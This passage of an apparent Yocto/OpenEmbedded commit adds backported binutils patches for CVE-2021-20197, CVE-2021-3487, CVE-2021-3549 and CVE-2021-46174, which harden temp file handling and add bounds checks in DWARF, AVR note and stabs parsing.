175 && *attr.u.blk->data == DW_OP_addr)
176 {
177- var->stack = 0;
178+ var->stack = FALSE;
179
180 /* Verify that DW_OP_addr is the only opcode in the
181 location, in which case the block size will be 1
182@@ -3888,7 +3937,7 @@ comp_unit_hash_info (struct dwarf2_debug
183 each_var = each_var->prev_var)
184 {
185 /* Skip stack vars and vars with no files or names. */
186- if (each_var->stack == 0
187+ if (! each_var->stack
188 && each_var->file != NULL
189 && each_var->name != NULL)
190 /* There is no need to copy name string into hash table as
191Index: git/bfd/ChangeLog
192===================================================================
193--- git.orig/bfd/ChangeLog
194+++ git/bfd/ChangeLog
195@@ -1,3 +1,9 @@
196+2020-04-16 Alan Modra <amodra@gmail.com>
197+
198+ PR 25827
199+ * dwarf2.c (scan_unit_for_symbols): Wrap overlong lines. Don't
200+ strdup(0).
201+
202 2021-05-03 Alan Modra <amodra@gmail.com>
203
204 PR 27755
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2021-20197.patch b/meta/recipes-devtools/binutils/binutils/CVE-2021-20197.patch
new file mode 100644
index 0000000000..423814f98d
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2021-20197.patch
@@ -0,0 +1,572 @@
1From d3edaa91d4cf7202ec14342410194841e2f67f12 Mon Sep 17 00:00:00 2001
2From: Alan Modra <amodra@gmail.com>
3Date: Fri, 26 Feb 2021 11:30:32 +1030
4Subject: [PATCH v2] Reinstate various pieces backed out from smart_rename changes
5
6In the interests of a stable release various last minute smart_rename
7patches were backed out of the 2.36 branch. The main reason to
8reinstate some of those backed out changes here is to make necessary
9followup fixes to commit 8e03235147a9 simple cherry-picks from
10mainline. A secondary reason is that ar -M support isn't fixed for
11pr26945 without this patch.
12
13 PR 26945
14 * ar.c: Don't include libbfd.h.
15 (write_archive): Replace xmalloc+strcpy with xstrdup.
16 * arsup.c (temp_name, real_ofd): New static variables.
17 (ar_open): Use make_tempname and bfd_fdopenw.
18 (ar_save): Adjust to suit ar_open changes.
19 * objcopy.c: Don't include libbfd.h.
20 * rename.c: Rename and reorder variables.
21
22(cherry picked from commit 95b91a043aeaeb546d2fea556d84a2de1e917770)
23
24Upstream-Status: Backport [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=d3edaa91d4cf7202ec14342410194841e2f67f12]
25CVE: CVE-2021-20197
26Signed-off-by: Vinay Kumar <vinay.m.engg@gmail.com>
27---
28 bfd/bfd-in2.h | 2 +
29 bfd/opncls.c | 33 ++++++++++
30 binutils/ar.c | 15 +++--
31 binutils/arsup.c | 37 ++++++++----
32 binutils/bucomm.c | 4 +-
33 binutils/bucomm.h | 5 +-
34 binutils/objcopy.c | 37 +++++++-----
35 binutils/rename.c | 148 +++++++++++----------------------------------
36 8 files changed, 133 insertions(+), 148 deletions(-)
37
38diff --git a/bfd/bfd-in2.h b/bfd/bfd-in2.h
39index 2e453c50c18..e53f54a8ab7 100644
40--- a/bfd/bfd-in2.h
41+++ b/bfd/bfd-in2.h
42@@ -588,6 +588,8 @@ bfd *bfd_openr (const char *filename, const char *target);
43
44 bfd *bfd_fdopenr (const char *filename, const char *target, int fd);
45
46+bfd *bfd_fdopenw (const char *filename, const char *target, int fd);
47+
48 bfd *bfd_openstreamr (const char * filename, const char * target,
49 void * stream);
50
51diff --git a/bfd/opncls.c b/bfd/opncls.c
52index a03ad51c8fa..f9da97ed710 100644
53--- a/bfd/opncls.c
54+++ b/bfd/opncls.c
55@@ -370,6 +370,39 @@ bfd_fdopenr (const char *filename, const char *target, int fd)
56 return bfd_fopen (filename, target, mode, fd);
57 }
58
59+/*
60+FUNCTION
61+ bfd_fdopenw
62+
63+SYNOPSIS
64+ bfd *bfd_fdopenw (const char *filename, const char *target, int fd);
65+
66+DESCRIPTION
67+ <<bfd_fdopenw>> is exactly like <<bfd_fdopenr>> with the exception that
68+ the resulting BFD is suitable for output.
69+*/
70+
71+bfd *
72+bfd_fdopenw (const char *filename, const char *target, int fd)
73+{
74+ bfd *out = bfd_fdopenr (filename, target, fd);
75+
76+ if (out != NULL)
77+ {
78+ if (!bfd_write_p (out))
79+ {
80+ close (fd);
81+ _bfd_delete_bfd (out);
82+ out = NULL;
83+ bfd_set_error (bfd_error_invalid_operation);
84+ }
85+ else
86+ out->direction = write_direction;
87+ }
88+
89+ return out;
90+}
91+
92 /*
93 FUNCTION
94 bfd_openstreamr
95diff --git a/binutils/ar.c b/binutils/ar.c
96index 1057db9980e..c33a11e0d70 100644
97--- a/binutils/ar.c
98+++ b/binutils/ar.c
99@@ -1195,20 +1195,23 @@ write_archive (bfd *iarch)
100 bfd *obfd;
101 char *old_name, *new_name;
102 bfd *contents_head = iarch->archive_next;
103+ int ofd = -1;
104
105- old_name = (char *) xmalloc (strlen (bfd_get_filename (iarch)) + 1);
106- strcpy (old_name, bfd_get_filename (iarch));
107- new_name = make_tempname (old_name);
108+ old_name = xstrdup (bfd_get_filename (iarch));
109+ new_name = make_tempname (old_name, &ofd);
110
111 if (new_name == NULL)
112 bfd_fatal (_("could not create temporary file whilst writing archive"));
113
114 output_filename = new_name;
115
116- obfd = bfd_openw (new_name, bfd_get_target (iarch));
117+ obfd = bfd_fdopenw (new_name, bfd_get_target (iarch), ofd);
118
119 if (obfd == NULL)
120- bfd_fatal (old_name);
121+ {
122+ close (ofd);
123+ bfd_fatal (old_name);
124+ }
125
126 output_bfd = obfd;
127
128@@ -1246,7 +1249,7 @@ write_archive (bfd *iarch)
129 /* We don't care if this fails; we might be creating the archive. */
130 bfd_close (iarch);
131
132- if (smart_rename (new_name, old_name, 0) != 0)
133+ if (smart_rename (new_name, old_name, NULL) != 0)
134 xexit (1);
135 free (old_name);
136 free (new_name);
137diff --git a/binutils/arsup.c b/binutils/arsup.c
138index 00967c972cd..b8ae4f7ec1a 100644
139--- a/binutils/arsup.c
140+++ b/binutils/arsup.c
141@@ -42,6 +42,8 @@ extern int deterministic;
142
143 static bfd *obfd;
144 static char *real_name;
145+static char *temp_name;
146+static int real_ofd;
147 static FILE *outfile;
148
149 static void
150@@ -149,27 +151,24 @@ maybequit (void)
151 void
152 ar_open (char *name, int t)
153 {
154- char *tname;
155- const char *bname = lbasename (name);
156- real_name = name;
157+ real_name = xstrdup (name);
158+ temp_name = make_tempname (real_name, &real_ofd);
159
160- /* Prepend tmp- to the beginning, to avoid file-name clashes after
161- truncation on filesystems with limited namespaces (DOS). */
162- if (asprintf (&tname, "%.*stmp-%s", (int) (bname - name), name, bname) == -1)
163+ if (temp_name == NULL)
164 {
165- fprintf (stderr, _("%s: Can't allocate memory for temp name (%s)\n"),
166+ fprintf (stderr, _("%s: Can't open temporary file (%s)\n"),
167 program_name, strerror(errno));
168 maybequit ();
169 return;
170 }
171
172- obfd = bfd_openw (tname, NULL);
173+ obfd = bfd_fdopenw (temp_name, NULL, real_ofd);
174
175 if (!obfd)
176 {
177 fprintf (stderr,
178 _("%s: Can't open output archive %s\n"),
179- program_name, tname);
180+ program_name, temp_name);
181
182 maybequit ();
183 }
184@@ -344,16 +343,30 @@ ar_save (void)
185 }
186 else
187 {
188- char *ofilename = xstrdup (bfd_get_filename (obfd));
189+ struct stat target_stat;
190
191 if (deterministic > 0)
192 obfd->flags |= BFD_DETERMINISTIC_OUTPUT;
193
194 bfd_close (obfd);
195
196- smart_rename (ofilename, real_name, 0);
197+ if (stat (real_name, &target_stat) != 0)
198+ {
199+ /* The temp file created in ar_open has mode 0600 as per mkstemp.
200+ Create the real empty output file here so smart_rename will
201+ update the mode according to the process umask. */
202+ obfd = bfd_openw (real_name, NULL);
203+ if (obfd != NULL)
204+ {
205+ bfd_set_format (obfd, bfd_archive);
206+ bfd_close (obfd);
207+ }
208+ }
209+
210+ smart_rename (temp_name, real_name, NULL);
211 obfd = 0;
212- free (ofilename);
213+ free (temp_name);
214+ free (real_name);
215 }
216 }
217
218diff --git a/binutils/bucomm.c b/binutils/bucomm.c
219index 9e6a02843e6..53244201f89 100644
220--- a/binutils/bucomm.c
221+++ b/binutils/bucomm.c
222@@ -532,7 +532,7 @@ template_in_dir (const char *path)
223 as FILENAME. */
224
225 char *
226-make_tempname (const char *filename)
227+make_tempname (const char *filename, int *ofd)
228 {
229 char *tmpname = template_in_dir (filename);
230 int fd;
231@@ -550,7 +550,7 @@ make_tempname (const char *filename)
232 free (tmpname);
233 return NULL;
234 }
235- close (fd);
236+ *ofd = fd;
237 return tmpname;
238 }
239
240diff --git a/binutils/bucomm.h b/binutils/bucomm.h
241index d8318343f78..2b164e0af68 100644
242--- a/binutils/bucomm.h
243+++ b/binutils/bucomm.h
244@@ -51,7 +51,7 @@ int display_info (void);
245
246 void print_arelt_descr (FILE *, bfd *, bfd_boolean, bfd_boolean);
247
248-char *make_tempname (const char *);
249+char *make_tempname (const char *, int *);
250 char *make_tempdir (const char *);
251
252 bfd_vma parse_vma (const char *, const char *);
253@@ -71,7 +71,8 @@ extern void print_version (const char *);
254 /* In rename.c. */
255 extern void set_times (const char *, const struct stat *);
256
257-extern int smart_rename (const char *, const char *, int);
258+extern int smart_rename (const char *, const char *, struct stat *);
259+
260
261 /* In libiberty. */
262 void *xmalloc (size_t);
263diff --git a/binutils/objcopy.c b/binutils/objcopy.c
264index 212e25144e6..5ccbd926610 100644
265--- a/binutils/objcopy.c
266+++ b/binutils/objcopy.c
267@@ -3682,7 +3682,7 @@ set_long_section_mode (bfd *output_bfd, bfd *input_bfd, enum long_section_name_h
268 /* The top-level control. */
269
270 static void
271-copy_file (const char *input_filename, const char *output_filename,
272+copy_file (const char *input_filename, const char *output_filename, int ofd,
273 const char *input_target, const char *output_target,
274 const bfd_arch_info_type *input_arch)
275 {
276@@ -3757,9 +3757,14 @@ copy_file (const char *input_filename, const char *output_filename,
277 else
278 force_output_target = TRUE;
279
280- obfd = bfd_openw (output_filename, output_target);
281+ if (ofd >= 0)
282+ obfd = bfd_fdopenw (output_filename, output_target, ofd);
283+ else
284+ obfd = bfd_openw (output_filename, output_target);
285+
286 if (obfd == NULL)
287 {
288+ close (ofd);
289 bfd_nonfatal_message (output_filename, NULL, NULL, NULL);
290 status = 1;
291 return;
292@@ -3787,13 +3792,19 @@ copy_file (const char *input_filename, const char *output_filename,
293 if (output_target == NULL)
294 output_target = bfd_get_target (ibfd);
295
296- obfd = bfd_openw (output_filename, output_target);
297+ if (ofd >= 0)
298+ obfd = bfd_fdopenw (output_filename, output_target, ofd);
299+ else
300+ obfd = bfd_openw (output_filename, output_target);
301+
302 if (obfd == NULL)
303 {
304+ close (ofd);
305 bfd_nonfatal_message (output_filename, NULL, NULL, NULL);
306 status = 1;
307 return;
308 }
309+
310 /* This is a no-op on non-Coff targets. */
311 set_long_section_mode (obfd, ibfd, long_section_names);
312
313@@ -4746,6 +4757,7 @@ strip_main (int argc, char *argv[])
314 int hold_status = status;
315 struct stat statbuf;
316 char *tmpname;
317+ int tmpfd = -1;
318
319 if (get_file_size (argv[i]) < 1)
320 {
321@@ -4760,7 +4772,7 @@ strip_main (int argc, char *argv[])
322
323 if (output_file == NULL
324 || filename_cmp (argv[i], output_file) == 0)
325- tmpname = make_tempname (argv[i]);
326+ tmpname = make_tempname (argv[i], &tmpfd);
327 else
328 tmpname = output_file;
329
330@@ -4773,15 +4785,13 @@ strip_main (int argc, char *argv[])
331 }
332
333 status = 0;
334- copy_file (argv[i], tmpname, input_target, output_target, NULL);
335+ copy_file (argv[i], tmpname, tmpfd, input_target, output_target, NULL);
336 if (status == 0)
337 {
338- if (preserve_dates)
339- set_times (tmpname, &statbuf);
340 if (output_file != tmpname)
341 status = (smart_rename (tmpname,
342 output_file ? output_file : argv[i],
343- preserve_dates) != 0);
344+ preserve_dates ? &statbuf : NULL) != 0);
345 if (status == 0)
346 status = hold_status;
347 }
348@@ -4993,7 +5003,7 @@ copy_main (int argc, char *argv[])
349 bfd_boolean formats_info = FALSE;
350 bfd_boolean use_globalize = FALSE;
351 bfd_boolean use_keep_global = FALSE;
352- int c;
353+ int c, tmpfd = -1;
354 struct stat statbuf;
355 const bfd_arch_info_type *input_arch = NULL;
356
357@@ -5839,7 +5849,7 @@ copy_main (int argc, char *argv[])
358 are the same, then create a temp and rename the result into the input. */
359 if (output_filename == NULL
360 || filename_cmp (input_filename, output_filename) == 0)
361- tmpname = make_tempname (input_filename);
362+ tmpname = make_tempname (input_filename, &tmpfd);
363 else
364 tmpname = output_filename;
365
366@@ -5847,14 +5857,13 @@ copy_main (int argc, char *argv[])
367 fatal (_("warning: could not create temporary file whilst copying '%s', (error: %s)"),
368 input_filename, strerror (errno));
369
370- copy_file (input_filename, tmpname, input_target, output_target, input_arch);
371+ copy_file (input_filename, tmpname, tmpfd, input_target, output_target,
372+ input_arch);
373 if (status == 0)
374 {
375- if (preserve_dates)
376- set_times (tmpname, &statbuf);
377 if (tmpname != output_filename)
378 status = (smart_rename (tmpname, input_filename,
379- preserve_dates) != 0);
380+ preserve_dates ? &statbuf : NULL) != 0);
381 }
382 else
383 unlink_if_ordinary (tmpname);
384diff --git a/binutils/rename.c b/binutils/rename.c
385index bf3b68d0462..07d44d0f314 100644
386--- a/binutils/rename.c
387+++ b/binutils/rename.c
388@@ -24,14 +24,9 @@
389
390 #ifdef HAVE_GOOD_UTIME_H
391 #include <utime.h>
392-#else /* ! HAVE_GOOD_UTIME_H */
393-#ifdef HAVE_UTIMES
394+#elif defined HAVE_UTIMES
395 #include <sys/time.h>
396-#endif /* HAVE_UTIMES */
397-#endif /* ! HAVE_GOOD_UTIME_H */
398-
399-#if ! defined (_WIN32) || defined (__CYGWIN32__)
400-static int simple_copy (const char *, const char *);
401+#endif
402
403 /* The number of bytes to copy at once. */
404 #define COPY_BUF 8192
405@@ -82,7 +77,6 @@ simple_copy (const char *from, const char *to)
406 }
407 return 0;
408 }
409-#endif /* __CYGWIN32__ or not _WIN32 */
410
411 /* Set the times of the file DESTINATION to be the same as those in
412 STATBUF. */
413@@ -91,122 +85,52 @@ void
414 set_times (const char *destination, const struct stat *statbuf)
415 {
416 int result;
417-
418- {
419 #ifdef HAVE_GOOD_UTIME_H
420- struct utimbuf tb;
421-
422- tb.actime = statbuf->st_atime;
423- tb.modtime = statbuf->st_mtime;
424- result = utime (destination, &tb);
425-#else /* ! HAVE_GOOD_UTIME_H */
426-#ifndef HAVE_UTIMES
427- long tb[2];
428-
429- tb[0] = statbuf->st_atime;
430- tb[1] = statbuf->st_mtime;
431- result = utime (destination, tb);
432-#else /* HAVE_UTIMES */
433- struct timeval tv[2];
434-
435- tv[0].tv_sec = statbuf->st_atime;
436- tv[0].tv_usec = 0;
437- tv[1].tv_sec = statbuf->st_mtime;
438- tv[1].tv_usec = 0;
439- result = utimes (destination, tv);
440-#endif /* HAVE_UTIMES */
441-#endif /* ! HAVE_GOOD_UTIME_H */
442- }
443+ struct utimbuf tb;
444+
445+ tb.actime = statbuf->st_atime;
446+ tb.modtime = statbuf->st_mtime;
447+ result = utime (destination, &tb);
448+#elif defined HAVE_UTIMES
449+ struct timeval tv[2];
450+
451+ tv[0].tv_sec = statbuf->st_atime;
452+ tv[0].tv_usec = 0;
453+ tv[1].tv_sec = statbuf->st_mtime;
454+ tv[1].tv_usec = 0;
455+ result = utimes (destination, tv);
456+#else
457+ long tb[2];
458+
459+ tb[0] = statbuf->st_atime;
460+ tb[1] = statbuf->st_mtime;
461+ result = utime (destination, tb);
462+#endif
463
464 if (result != 0)
465 non_fatal (_("%s: cannot set time: %s"), destination, strerror (errno));
466 }
467
468-#ifndef S_ISLNK
469-#ifdef S_IFLNK
470-#define S_ISLNK(m) (((m) & S_IFMT) == S_IFLNK)
471-#else
472-#define S_ISLNK(m) 0
473-#define lstat stat
474-#endif
475-#endif
476-
477-/* Rename FROM to TO, copying if TO is a link.
478- Return 0 if ok, -1 if error. */
479+/* Copy FROM to TO. TARGET_STAT has the file status that, if non-NULL,
480+ is used to fix up timestamps. Return 0 if ok, -1 if error.
481+ At one time this function renamed files, but file permissions are
482+ tricky to update given the number of different schemes used by
483+ various systems. So now we just copy. */
484
485 int
486-smart_rename (const char *from, const char *to, int preserve_dates ATTRIBUTE_UNUSED)
487+smart_rename (const char *from, const char *to,
488+ struct stat *target_stat)
489 {
490- bfd_boolean exists;
491- struct stat s;
492- int ret = 0;
493-
494- exists = lstat (to, &s) == 0;
495-
496-#if defined (_WIN32) && !defined (__CYGWIN32__)
497- /* Win32, unlike unix, will not erase `to' in `rename(from, to)' but
498- fail instead. Also, chown is not present. */
499+ int ret;
500
501- if (exists)
502- remove (to);
503-
504- ret = rename (from, to);
505+ ret = simple_copy (from, to);
506 if (ret != 0)
507- {
508- /* We have to clean up here. */
509- non_fatal (_("unable to rename '%s'; reason: %s"), to, strerror (errno));
510- unlink (from);
511- }
512-#else
513- /* Use rename only if TO is not a symbolic link and has
514- only one hard link, and we have permission to write to it. */
515- if (! exists
516- || (!S_ISLNK (s.st_mode)
517- && S_ISREG (s.st_mode)
518- && (s.st_mode & S_IWUSR)
519- && s.st_nlink == 1)
520- )
521- {
522- ret = rename (from, to);
523- if (ret == 0)
524- {
525- if (exists)
526- {
527- /* Try to preserve the permission bits and ownership of
528- TO. First get the mode right except for the setuid
529- bit. Then change the ownership. Then fix the setuid
530- bit. We do the chmod before the chown because if the
531- chown succeeds, and we are a normal user, we won't be
532- able to do the chmod afterward. We don't bother to
533- fix the setuid bit first because that might introduce
534- a fleeting security problem, and because the chown
535- will clear the setuid bit anyhow. We only fix the
536- setuid bit if the chown succeeds, because we don't
537- want to introduce an unexpected setuid file owned by
538- the user running objcopy. */
539- chmod (to, s.st_mode & 0777);
540- if (chown (to, s.st_uid, s.st_gid) >= 0)
541- chmod (to, s.st_mode & 07777);
542- }
543- }
544- else
545- {
546- /* We have to clean up here. */
547- non_fatal (_("unable to rename '%s'; reason: %s"), to, strerror (errno));
548- unlink (from);
549- }
550- }
551- else
552- {
553- ret = simple_copy (from, to);
554- if (ret != 0)
555- non_fatal (_("unable to copy file '%s'; reason: %s"), to, strerror (errno));
556+ non_fatal (_("unable to copy file '%s'; reason: %s"),
557+ to, strerror (errno));
558
559- if (preserve_dates)
560- set_times (to, &s);
561- unlink (from);
562- }
563-#endif /* _WIN32 && !__CYGWIN32__ */
564+ if (target_stat != NULL)
565+ set_times (to, target_stat);
566+ unlink (from);
567
568 return ret;
569 }
570--
5712.17.1
572
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2021-3487.patch b/meta/recipes-devtools/binutils/binutils/CVE-2021-3487.patch
new file mode 100644
index 0000000000..1502d03f43
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2021-3487.patch
@@ -0,0 +1,83 @@
1From 647cebce12a6b0a26960220caff96ff38978cf24 Mon Sep 17 00:00:00 2001
2From: Nick Clifton <nickc@redhat.com>
3Date: Thu, 26 Nov 2020 17:08:33 +0000
4Subject: [PATCH] Prevent a memory allocation failure when parsing corrupt
5 DWARF debug sections.
6
7 PR 26946
8 * dwarf2.c (read_section): Check for debug sections with excessive
9 sizes.
10
11
12Upstream-Status: Backport [
13https://sourceware.org/git/?p=binutils-gdb.git;a=patch;h=647cebce12a6b0a26960220caff96ff38978cf24
14]
15CVE: CVE-2021-3487
16Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
17
18---
19 bfd/dwarf2.c | 25 +++++++++++++++++++------
20 1 files changed, 25 insertions(+), 6 deletions(-)
21
22diff --git a/bfd/dwarf2.c b/bfd/dwarf2.c
23index 977bf43a6a1..8bbfc81d3e7 100644
24--- a/bfd/dwarf2.c
25+++ b/bfd/dwarf2.c
26@@ -531,22 +531,24 @@ read_section (bfd * abfd,
27 bfd_byte ** section_buffer,
28 bfd_size_type * section_size)
29 {
30- asection *msec;
31 const char *section_name = sec->uncompressed_name;
32 bfd_byte *contents = *section_buffer;
33- bfd_size_type amt;
34
35 /* The section may have already been read. */
36 if (contents == NULL)
37 {
38+ bfd_size_type amt;
39+ asection *msec;
40+ ufile_ptr filesize;
41+
42 msec = bfd_get_section_by_name (abfd, section_name);
43- if (! msec)
44+ if (msec == NULL)
45 {
46 section_name = sec->compressed_name;
47 if (section_name != NULL)
48 msec = bfd_get_section_by_name (abfd, section_name);
49 }
50- if (! msec)
51+ if (msec == NULL)
52 {
53 _bfd_error_handler (_("DWARF error: can't find %s section."),
54 sec->uncompressed_name);
55@@ -554,12 +556,23 @@ read_section (bfd * abfd,
56 return FALSE;
57 }
58
59- *section_size = msec->rawsize ? msec->rawsize : msec->size;
60+ amt = bfd_get_section_limit_octets (abfd, msec);
61+ filesize = bfd_get_file_size (abfd);
62+ if (amt >= filesize)
63+ {
64+ /* PR 26946 */
65+ _bfd_error_handler (_("DWARF error: section %s is larger than its filesize! (0x%lx vs 0x%lx)"),
66+ section_name, (long) amt, (long) filesize);
67+ bfd_set_error (bfd_error_bad_value);
68+ return FALSE;
69+ }
70+ *section_size = amt;
71 /* Paranoia - alloc one extra so that we can make sure a string
72 section is NUL terminated. */
73- amt = *section_size + 1;
74+ amt += 1;
75 if (amt == 0)
76 {
77+ /* Paranoia - this should never happen. */
78 bfd_set_error (bfd_error_no_memory);
79 return FALSE;
80 }
81--
822.27.0
83
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch b/meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch
new file mode 100644
index 0000000000..5f56dd7696
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch
@@ -0,0 +1,183 @@
1From 1cfcf3004e1830f8fe9112cfcd15285508d2c2b7 Mon Sep 17 00:00:00 2001
2From: Alan Modra <amodra@gmail.com>
3Date: Thu, 11 Feb 2021 16:56:42 +1030
4Subject: [PATCH] PR27290, PR27293, PR27295, various avr objdump fixes
5
6Adds missing sanity checks for avr device info note, to avoid
7potential buffer overflows. Uses bfd_malloc_and_get_section for
8sanity checking section size.
9
10 PR 27290
11 PR 27293
12 PR 27295
13 * od-elf32_avr.c (elf32_avr_get_note_section_contents): Formatting.
14 Use bfd_malloc_and_get_section.
15 (elf32_avr_get_note_desc): Formatting. Return descsz. Sanity
16 check namesz. Return NULL if descsz is too small. Ensure
17 string table is terminated.
18 (elf32_avr_get_device_info): Formatting. Add note_size param.
19 Sanity check note.
20 (elf32_avr_dump_mem_usage): Adjust to suit.
21
22Upstream-Status: Backport
23CVE: CVE-2021-3549
24Signed-of-by: Armin Kuster <akuster@mvista.com>
25
26---
27diff --git a/binutils/ChangeLog b/binutils/ChangeLog
28index 1e9a96c9bb6..02e5019204e 100644
29--- a/binutils/ChangeLog
30+++ b/binutils/ChangeLog
31@@ -1,3 +1,17 @@
32+2021-02-11 Alan Modra <amodra@gmail.com>
33+
34+ PR 27290
35+ PR 27293
36+ PR 27295
37+ * od-elf32_avr.c (elf32_avr_get_note_section_contents): Formatting.
38+ Use bfd_malloc_and_get_section.
39+ (elf32_avr_get_note_desc): Formatting. Return descsz. Sanity
40+ check namesz. Return NULL if descsz is too small. Ensure
41+ string table is terminated.
42+ (elf32_avr_get_device_info): Formatting. Add note_size param.
43+ Sanity check note.
44+ (elf32_avr_dump_mem_usage): Adjust to suit.
45+
46 2020-03-25 H.J. Lu <hongjiu.lu@intel.com>
47
48 * ar.c (main): Update bfd_plugin_set_program_name call.
49diff --git a/binutils/od-elf32_avr.c b/binutils/od-elf32_avr.c
50index 5ec99957fe9..1d32bce918e 100644
51--- a/binutils/od-elf32_avr.c
52+++ b/binutils/od-elf32_avr.c
53@@ -77,23 +77,29 @@ elf32_avr_filter (bfd *abfd)
54 return bfd_get_flavour (abfd) == bfd_target_elf_flavour;
55 }
56
57-static char*
58+static char *
59 elf32_avr_get_note_section_contents (bfd *abfd, bfd_size_type *size)
60 {
61 asection *section;
62+ bfd_byte *contents;
63
64- if ((section = bfd_get_section_by_name (abfd, ".note.gnu.avr.deviceinfo")) == NULL)
65+ section = bfd_get_section_by_name (abfd, ".note.gnu.avr.deviceinfo");
66+ if (section == NULL)
67 return NULL;
68
69- *size = bfd_section_size (section);
70- char *contents = (char *) xmalloc (*size);
71- bfd_get_section_contents (abfd, section, contents, 0, *size);
72+ if (!bfd_malloc_and_get_section (abfd, section, &contents))
73+ {
74+ free (contents);
75+ contents = NULL;
76+ }
77
78- return contents;
79+ *size = bfd_section_size (section);
80+ return (char *) contents;
81 }
82
83-static char* elf32_avr_get_note_desc (bfd *abfd, char *contents,
84- bfd_size_type size)
85+static char *
86+elf32_avr_get_note_desc (bfd *abfd, char *contents, bfd_size_type size,
87+ bfd_size_type *descsz)
88 {
89 Elf_External_Note *xnp = (Elf_External_Note *) contents;
90 Elf_Internal_Note in;
91@@ -107,42 +113,54 @@ static char* elf32_avr_get_note_desc (bfd *abfd, char *contents,
92 if (in.namesz > contents - in.namedata + size)
93 return NULL;
94
95+ if (in.namesz != 4 || strcmp (in.namedata, "AVR") != 0)
96+ return NULL;
97+
98 in.descsz = bfd_get_32 (abfd, xnp->descsz);
99 in.descdata = in.namedata + align_power (in.namesz, 2);
100- if (in.descsz != 0
101- && (in.descdata >= contents + size
102- || in.descsz > contents - in.descdata + size))
103+ if (in.descsz < 6 * sizeof (uint32_t)
104+ || in.descdata >= contents + size
105+ || in.descsz > contents - in.descdata + size)
106 return NULL;
107
108- if (strcmp (in.namedata, "AVR") != 0)
109- return NULL;
110+ /* If the note has a string table, ensure it is 0 terminated. */
111+ if (in.descsz > 8 * sizeof (uint32_t))
112+ in.descdata[in.descsz - 1] = 0;
113
114+ *descsz = in.descsz;
115 return in.descdata;
116 }
117
118 static void
119 elf32_avr_get_device_info (bfd *abfd, char *description,
120- deviceinfo *device)
121+ bfd_size_type desc_size, deviceinfo *device)
122 {
123 if (description == NULL)
124 return;
125
126 const bfd_size_type memory_sizes = 6;
127
128- memcpy (device, description, memory_sizes * sizeof(uint32_t));
129- device->name = NULL;
130+ memcpy (device, description, memory_sizes * sizeof (uint32_t));
131+ desc_size -= memory_sizes * sizeof (uint32_t);
132+ if (desc_size < 8)
133+ return;
134
135- uint32_t *stroffset_table = ((uint32_t *) description) + memory_sizes;
136+ uint32_t *stroffset_table = (uint32_t *) description + memory_sizes;
137 bfd_size_type stroffset_table_size = bfd_get_32 (abfd, stroffset_table);
138- char *str_table = ((char *) stroffset_table) + stroffset_table_size;
139
140 /* If the only content is the size itself, there's nothing in the table */
141- if (stroffset_table_size == 4)
142+ if (stroffset_table_size < 8)
143 return;
144+ if (desc_size <= stroffset_table_size)
145+ return;
146+ desc_size -= stroffset_table_size;
147
148 /* First entry is the device name index. */
149 uint32_t device_name_index = bfd_get_32 (abfd, stroffset_table + 1);
150+ if (device_name_index >= desc_size)
151+ return;
152
153+ char *str_table = (char *) stroffset_table + stroffset_table_size;
154 device->name = str_table + device_name_index;
155 }
156
157@@ -183,7 +201,7 @@ static void
158 elf32_avr_dump_mem_usage (bfd *abfd)
159 {
160 char *description = NULL;
161- bfd_size_type note_section_size = 0;
162+ bfd_size_type sec_size, desc_size;
163
164 deviceinfo device = { 0, 0, 0, 0, 0, 0, NULL };
165 device.name = "Unknown";
166@@ -192,13 +210,13 @@ elf32_avr_dump_mem_usage (bfd *abfd)
167 bfd_size_type text_usage = 0;
168 bfd_size_type eeprom_usage = 0;
169
170- char *contents = elf32_avr_get_note_section_contents (abfd,
171- &note_section_size);
172+ char *contents = elf32_avr_get_note_section_contents (abfd, &sec_size);
173
174 if (contents != NULL)
175 {
176- description = elf32_avr_get_note_desc (abfd, contents, note_section_size);
177- elf32_avr_get_device_info (abfd, description, &device);
178+ description = elf32_avr_get_note_desc (abfd, contents, sec_size,
179+ &desc_size);
180+ elf32_avr_get_device_info (abfd, description, desc_size, &device);
181 }
182
183 elf32_avr_get_memory_usage (abfd, &text_usage, &data_usage,
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2021-46174.patch b/meta/recipes-devtools/binutils/binutils/CVE-2021-46174.patch
new file mode 100644
index 0000000000..2addf5139e
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2021-46174.patch
@@ -0,0 +1,35 @@
1From 46322722ad40ac1a75672ae0f62f4969195f1368 Mon Sep 17 00:00:00 2001
2From: Alan Modra <amodra@gmail.com>
3Date: Thu, 20 Jan 2022 13:58:38 +1030
4Subject: [PATCH] PR28753, buffer overflow in read_section_stabs_debugging_info
5
6 PR 28753
7 * rddbg.c (read_section_stabs_debugging_info): Don't read past
8 end of section when concatentating stab strings.
9
10CVE: CVE-2021-46174
11Upstream-Status: Backport [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=cad4d6b91e97]
12
13(cherry picked from commit 085b299b71721e15f5c5c5344dc3e4e4536dadba)
14(cherry picked from commit cad4d6b91e97b6962807d33c04ed7e7797788438)
15Signed-off-by: poojitha adireddy <pooadire@cisco.com>
16---
17 binutils/rddbg.c | 2 +-
18 1 file changed, 1 insertion(+), 1 deletion(-)
19
20diff --git a/binutils/rddbg.c b/binutils/rddbg.c
21index 72e934055b5..5e76d94a3c4 100644
22--- a/binutils/rddbg.c
23+++ b/binutils/rddbg.c
24@@ -207,7 +207,7 @@ read_section_stabs_debugging_info (bfd *abfd, asymbol **syms, long symcount,
25 an attempt to read the byte before 'strings' would occur. */
26 while ((len = strlen (s)) > 0
27 && s[len - 1] == '\\'
28- && stab + 12 < stabs + stabsize)
29+ && stab + 16 <= stabs + stabsize)
30 {
31 char *p;
32
33--
342.23.1
35
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-38533.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-38533.patch
new file mode 100644
index 0000000000..102d65f8a6
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-38533.patch
@@ -0,0 +1,37 @@
